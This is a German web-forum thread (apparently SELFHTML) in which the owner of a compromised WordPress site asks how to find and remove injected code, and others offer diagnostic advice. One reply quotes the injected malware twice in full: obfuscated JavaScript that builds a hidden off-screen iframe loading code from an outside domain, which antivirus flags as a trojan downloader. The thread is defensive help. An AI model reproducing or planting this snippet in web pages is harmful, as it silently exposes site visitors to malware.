Website gehackt?
0 0 
Der Martin
0 1 0 
niklaskamenisch
0 0 3
Website gehackt?
Hallo,
leider wurden wir heute von einem unserer Websitebesucher darauf aufmerksam gemacht, dass unsere Seite neuerdings sehr lange lädt. Als wir uns den Seitenquelltext (view-source:http://www.forum-thomanum.de/) angeschaut haben, um das Problem zu finden, ist uns aufgefallen, dass sich im unteren Bereich der Seite (hinter </body>) etwas eingenistet hat, was dort nicht hingehört.
Kann mir zufällig jemand sagen was das ist und wie man es weg bekommt? ;) In der Footer-PHP ist leider nichts zu finden.
Danke für Eure Hilfe!
-
Wenns nicht in der Footer steht, gibts noch andere Dateien die das da irgendwie rein bringen könnten?
Sonst mal den Hoster fragen. Ist das ne umsonst-Seite bei der man mit Werbung rechnen muss?
Find mal raus was diese Adresse da sein soll.-
Dank Dir für die Antwort!
Nein, es ist keine Umsonst-Seite. Was die Adresse zu bedeuten hat, kann ich leider nicht sagen. Was ich allerdings weiß, ist dass sie nicht von uns eingefügt wurde.
Gibt es eine Möglichkeit, die entsprechende Datei ausfindig zu machen?
-
Gibt es eine Möglichkeit, die entsprechende Datei ausfindig zu machen?
Das hängt natürlich stark vom Aufbau der Webseite ab. Wir kennen ja den Aufbau deiner Seite nicht. Such halt mal in den Dateien nach bestimmten Schlüsselwörtern in den Dateien.
Den Hoster würd ich trotzdem auf die Sache aufmerksam machen. Etwas weiter her geholt, vielleicht hat ja sogar der Webserver was abgekriegt.
-
Strato als Anbieter des Servers hat keine Unregelmäßigkeiten festgestellt.
Leider lässt sich das entsprechende Wort auch in den Dateien nicht finden. Eine Sucher erfolgte bereits - leider ohne Ergebnis. Bisher habe ich keine Ahnung, wo sich diese Zeilen verstecken ;/
-
Strato als Anbieter des Servers hat keine Unregelmäßigkeiten festgestellt.
Leider lässt sich das entsprechende Wort auch in den Dateien nicht finden. Eine Sucher erfolgte bereits - leider ohne Ergebnis. Bisher habe ich keine Ahnung, wo sich diese Zeilen verstecken ;/
haste schon mal geguckt, welche Dateien kürzlich verändert worden sind? Macht man ja wohl bei Wordpress nicht so oft, oder? Das könnte ein Hinweis sein. Ansonsten die Dateien downladen und per grep (linux) oder nem vernüftigen Suchtool nach diversen Begrifflichkeiten in diesem Verzeichnis suchen.
-
-
-
-
-
Hi,
leider wurden wir heute von einem unserer Websitebesucher darauf aufmerksam gemacht, dass unsere Seite neuerdings sehr lange lädt. Als wir uns den Seitenquelltext (view-source:http://www.forum-thomanum.de/) angeschaut haben, um das Problem zu finden, ist uns aufgefallen, dass sich im unteren Bereich der Seite (hinter </body>) etwas eingenistet hat, was dort nicht hingehört.
meinst du dieses Geschwür:
<script> var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://mytresca.com/counter.php'); _q.style.position = 'absolute'; _q.style.width = '16px'; _q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7d03d1087e22') + 1); _q.style.left = '-6200px'; document.write('<div id=\'pzadv\'></div>'); document.getElementById('pzadv').appendChild(_q); </script><script> var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://mytresca.com/counter.php'); _q.style.position = 'absolute'; _q.style.width = '16px'; _q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7d03d1087e22') + 1); _q.style.left = '-6200px'; document.write('<div id=\'pzadv\'></div>'); document.getElementById('pzadv').appendChild(_q); </script>Kann mir zufällig jemand sagen was das ist und wie man es weg bekommt? ;)
Was das ist? Offensichtlich hat jemand deine FTP-Zugangsdaten. Oder jemand hat die Sicherheitsmechanismen von Strato geknackt und alle Kunden beglückt, die auf demselben Server wohnen.
Wie man es wegbekommt? Editieren, Löschen. Aber damit bekämpft man natürlich nur Symptome, nicht Ursachen. Gleichzeitig solltest du daher deine Zugangsdaten (insbesondere das Passwort) ändern, und Strato sollte den Angriff bitte auch ernst nehmen und nachforschen, wie das zustande kam.Es ist ja nicht einmal sicher, dass Steven Teal, der Inhaber der Domain mytresca.com, wirklich was damit zu tun hat. Möglicherweise ist auch sein Webspace gekapert worden und wird nun missbraucht.
So long,
Martin--
"Drogen machen gleichgültig."
- "Na und? Mir doch egal."
Selfcode: fo:) ch:{ rl:| br:< n4:( ie:| mo:| va:) de:] zu:) fl:{ ss:) ls:µ js:(-
Dank Dir für die Info Martin, aber kannst Du mir sagen, wie ich an die entsprechende Datei rankomme, um es zu löschen? Denn im Footer und allen anderen Dateien finde ich dieses Geschwür leider nicht ;/
Vielen Dank!!!
-
Hallo,
Dank Dir für die Info Martin, aber kannst Du mir sagen, wie ich an die entsprechende Datei rankomme, um es zu löschen? Denn im Footer und allen anderen Dateien finde ich dieses Geschwür leider nicht ;/
keine Ahnung, wo das drinsteckt; ich kenne deinen Quellcode ja nicht.
Und dass es sich https://forum.selfhtml.org/?t=210438&m=1434402 um eine Wordpress-Installation handelt, ist eine wichtige Info, die du am besten schon im Startposting untergebracht hättest.Ciao,
Martin--
Schildkröten können mehr über den Weg berichten als Hasen.
Selfcode: fo:) ch:{ rl:| br:< n4:( ie:| mo:| va:) de:] zu:) fl:{ ss:) ls:µ js:(
-
-
-
مرحبا
Kann mir zufällig jemand sagen was das ist und wie man es weg bekommt? ;) In der Footer-PHP ist leider nichts zu finden.
Scheint wohl ein neues Hintertürchen in Wordpress zu sein.
Da nicht viele Seiten betroffen sind, könntest du vergleichen, welche Plaugins die betroffenen und du gemein haben, so könntest du herausfinden, welche Plugins für den Schadcode in Frage kommen.
mfg
-
Hello,
Kann mir zufällig jemand sagen was das ist und wie man es weg bekommt? ;) In der Footer-PHP ist leider nichts zu finden.
Ich bekomme sofort eine Virenmeldung von meinem NOD32.
JS/Iframe.EX Trojaner
und die Verbindung wird zurückgesetzt.
Und dazu findet man dann mittels Google:
http://www.securelist.com/en/descriptions/441154/Trojan-Downloader.JS.Iframe.exHilft Dir das nun weiter?
Poste am Ende bitte auf jeden Fall, was Ihr weiter unternommen habt.Liebe Grüße aus dem schönen Oberharz
Tom vom Berg
-
hi,
1. gibt es eine .htaccess datei?
eventuell wird die anfrage über eine datei umgeleitet und in dieser wird die normale ausgabe aufgerufen.2. kontrollier jedes verzeichnis, irgendwo kann eine datei liegen, die die lücke weiterhin offen hält (hatte ich bei strato selber schon)
3. kontrollier die dns einstellungen, soweit du zugriff darauf hast. ncht das sich da einer als "men in de middle" ausgibt. laut http://network-tools.com/nslook/ sieht es aber gut aus!
4. es gibt tricks, auch am ende noch etwas auszugeben, am besten die ganze webseite z.b. in netbeans auf machen und dort suchen. Dann findest die betroffenen stellen recht schnell
(Gerne kann man dich aber auch so unterstützen ...)
Gruß Niklas
--
Man muss nicht alles wissen, man sollte aber wissen, wo das nicht gewusste zu finden ist. -
moin,
Kann mir zufällig jemand sagen was das ist
Es gibt Proxy-Server, die können per ICAP die Inhalte der ausgelieferten Seiten verändern (z.B. Trojaner entfernen oder hinzufügen). In Deinem Fall scheint ein solcher Server sehr nahe am Provider zu stehen; den Übertragungsweg hast Du wahrscheinlich ausgeschlossen?
Möglicherweise ists auch der Webserver selbst, der um o.g. Protokoll erweitert wurde (Apache ICAP module).
Hotti
-
Hello,
schau Dir mal die Einstellung für "auto-prepend_file" und "auto_append_file" an.
Da kann man sowas gut unterbringen...
Liebe Grüße aus dem schönen Oberharz
Tom vom Berg
-
Danke für Eure Hilfe!
Du kommst mir vor wie das Berliner Mädel, dass in Stöckelschuhen auf einen 3000er steigt (naja... damit beginnt) und dann verlangt, dass der Bergrettungsdienst diese kostenlos rettet.
Du begibst Dich Dich nämlich ebenso grob/dreist fahrlässig in Gefahr und schlimmer noch, Du verbreitest den Wurm fröhlich weiter.
In so einem Fall gehört es sich einfach die Webseite (also Wordpress!)_sofort_ zu löschen, und eine aktuelle, um den wohl inzwischen erkannten Bug bereinigte Version aufzuspielen und zu kontrollieren, ob der Wurm dann noch da ist. Wenn Du das nicht hinbekommst, dann nimm Deinen Mist - verdammt noch mal - aus dem Netz oder hol dir einen Profi, der es richtet.
Fred
-
Hello Fred ...,
Du begibst Dich Dich nämlich ebenso grob/dreist fahrlässig in Gefahr und schlimmer noch, Du verbreitest den Wurm fröhlich weiter.
In so einem Fall gehört es sich einfach die Webseite (also Wordpress!)_sofort_ zu löschen,
ganz so hart habe ich es zwar nicht gesagt, aber ich gebe Dir Recht.
https://forum.selfhtml.org/?t=210438&m=1434408
hier hilft nur entfernen der schädlichen Inhalte, notfalls durch Totalabschaltung.
Liebe Grüße aus dem schönen Oberharz
Tom vom Berg
-
ganz so hart habe ich es zwar nicht gesagt, aber ich gebe Dir Recht.
Ich habe das so hart und deutlich formuliert, weil die schädlichen Inhalte trotz Deines Hinweises nach wie vor verbreitet werden. Das konnte ich nur so verstehen, als dass der für den TO nicht deutlich genug war.
Fred
-
-